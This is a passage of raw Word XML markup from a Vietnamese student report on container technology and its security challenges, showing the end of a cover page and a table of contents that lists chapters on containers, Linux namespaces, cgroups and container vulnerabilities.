                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>Hà Nội, ngày 1</w:t>
            </w:r>
            <w:r w:rsidR="00F133F0">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> tháng 05 năm 202</w:t>
            </w:r>
            <w:r w:rsidR="00F133F0">
              <w:rPr>
                <w:rStyle w:val="fontstyle01"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1AB6BF" w14:textId="798DF937" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="TimesNewRomanPSMT" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TimesNewRomanPSMT"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="fontstyle21"/>
              </w:rPr>
              <w:t>Học viên thực hiện</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2904F5F4" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FBEEB61" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRPr="00D10B4E" w:rsidRDefault="007E38B5" w:rsidP="00D10B4E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37147ABE" w14:textId="22D096B5" w:rsidR="007E38B5" w:rsidRPr="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E38B5">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              </w:rPr>
              <w:t>Nguyễn Tuấn Anh-B23CHCS001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67A9106F" w14:textId="311132D6" w:rsidR="007E38B5" w:rsidRDefault="007E38B5" w:rsidP="007E38B5">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD7FEF3" w14:textId="77777777" w:rsidR="007E38B5" w:rsidRDefault="007E38B5">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>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357DAAE0" w14:textId="77777777" w:rsidR="002052C6" w:rsidRPr="007E38B5" w:rsidRDefault="002052C6" w:rsidP="007E38B5">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:id w:val="704366663"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="5CE8FC8D" w14:textId="2FC89706" w:rsidR="003B15FC" w:rsidRPr="003B15FC" w:rsidRDefault="003B15FC" w:rsidP="003B15FC">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003B15FC">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="auto"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>MỤC LỤC</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0631B00C" w14:textId="09376AA7" w:rsidR="008B11B6" w:rsidRDefault="003B15FC">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc235976339" w:history="1">
            <w:r w:rsidR="008B11B6" w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DANH MỤC HÌNH VẼ</w:t>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="008B11B6">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B3B6EA3" w14:textId="3EDB1784"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40" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MỞ ĐẦU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976340 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7210387B" w14:textId="1258D8FF"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41" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 1: CƠ SỞ LÝ LUẬN VỀ CÔNG NGHỆ CONTAINER VÀ KIẾN TRÚC HỆ THỐNG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976341 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7353BBA5" w14:textId="34856D30"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2" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1. Giới thiệu chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976342 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E52979C" w14:textId="7B799241"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3" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Tổng quan về công nghệ Container hóa (Containerization)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976343 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="718F2073" w14:textId="756F5B03"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44" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.2.1. Khái niệm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976344 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ADCC175" w14:textId="3CC18A79"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45" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.2.2. Kiến trúc Monolithic và Microservice</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976345 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21F66BB7" w14:textId="7B6C9AAA"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6" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3. Khái niệm Container và Container Image</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976346 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Error! Bookmark not defined.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="058F0687" w14:textId="28F35B4F"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7" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4. Phân biệt Container và Máy ảo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976347 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AFA219D" w14:textId="4E75FC9D"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8" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.5. Kiến trúc phân lớp của hệ thống Container</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976348 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E86332" w14:textId="175CBEA9"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49" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6. Các cơ chế cô lập cốt lõi của Linux Kernel trong Container</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976349 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="163242DE" w14:textId="32CDCC96"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50" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6.1. Linux Namespaces (Không gian tên)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976350 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="213BFFFD" w14:textId="38E6891A"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51" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.6.2. Control Groups (cgroups)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976351 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15D84F60" w14:textId="7FD3C28C"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52" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.7. Kết luận chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976352 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2669CDC6" w14:textId="4059FDB8"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53" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 2: CÁC LỖ HỔNG VÀ THÁCH THỨC BẢO MẬT MỚI ĐỐI VỚI HỆ THỐNG CONTAINER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976353 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Error! Bookmark not defined.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4407EBBD" w14:textId="2F04C087" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1680"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976354" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
